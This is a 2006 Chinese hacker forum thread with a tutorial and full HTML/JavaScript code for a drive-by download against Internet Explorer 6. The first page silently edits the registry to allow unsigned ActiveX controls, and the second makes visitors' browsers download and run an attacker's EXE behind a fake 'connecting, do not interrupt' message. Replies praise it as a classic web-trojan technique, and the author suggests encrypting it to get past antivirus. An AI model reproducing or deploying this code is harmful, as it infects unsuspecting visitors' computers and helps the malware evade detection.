绿色兵团 » 兵团资料库 » IE6.0执行EXE文件的网页代码

寂寞Hacker 发表于 2006-7-15 17:36

IE6.0执行EXE文件的网页代码

让IE6.0执行EXE文件的网页
下面我们来看看怎么让6.0来执行我们空间的同路径下的一个EXE文件，方法大致是当用户开启第一个HTML的页面时，通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项，变为“启用下栽未签名的ActiveX控件”，然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件，实质就是我们所要执行的EXE文件，好了，下面我们来说说具体的制作步骤。
【第一步】建立一个1.HTM的文件，内容如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open('http://www.主页.com/2.htm','colortext')
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

这里需要说明的是，其中“window.open('http://www.主页.com/2.htm','colortext')”中的“'http://www.主页.com/2.htm”要改为你自己的主页空间的路径，其中“setTimeout("opencolortext()",1500)”的“1500”是延时1.5秒中之后打开我们一会将要做的2.HTM文件。好，我们现在就来做这个2.HTM文件，内容如下：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">连接中,请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>
说明，代码中“run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">" ”的“3.EXE”就是IE将来要执行的同路径下你的EXE文件.至于连接中,请勿终断，完全是迷惑对方的你自己可以变成自己的话。
好了现在将我们做的1.HTM、2.HTM和自己要对方执行的EXE文件一并上传到自己的主页空间下。
现在就让我们用IE6.0来直接浏览这个1.HTM的文件吧，当打开这个页面的1-2秒后应该自动打开另一个空白的页面，紧接着你的EXE文件将被执行，注意所放的EXE文件不要过大，最好能控制在100K之内

wangb0071 发表于 2006-7-16 15:20

辛苦了阿 谢谢了啊.................

coolbrother 发表于 2006-11-18 13:51

收藏！认真学习！搂住辛苦了！

北冥小黑鱼 发表于 2006-11-22 13:40

呵呵。。。。学了东西一定要养成看帖必回的好习惯

coolbrother 发表于 2006-11-24 12:29

我要收藏起来！楼主辛苦了！

x10z79520 发表于 2006-11-25 10:16

谢谢楼主了，学好黑客网页一定要学好啊

wskihc521 发表于 2006-12-4 18:31

不错不错~  回去好好研究~~~~~

adm2002 发表于 2006-12-12 22:36

可惜已经被认为是病毒了

寂寞Hacker 发表于 2006-12-14 17:38

随便加下密还是不错的！

eping 发表于 2006-12-18 18:26

tnnd.... 本页有网马。。。。。。。

li994791 发表于 2007-2-25 00:11

找了好久终于找到了谢谢啊.缘分那~~

xymcc 发表于 2007-2-25 10:13

经典挂马步骤啊.............!

adslhack 发表于 2007-3-9 20:50

收下了。。。。。。。。

liuyq6 发表于 2007-3-20 19:36

学习。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

herryme 发表于 2007-3-21 22:22

谢谢！我会好好学习一下的

下落不明go 发表于 2007-4-1 14:20

顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶

下落不明go 发表于 2007-4-1 14:20

顶顶顶顶顶顶顶顶顶顶顶顶顶顶

查看完整版本: IE6.0执行EXE文件的网页代码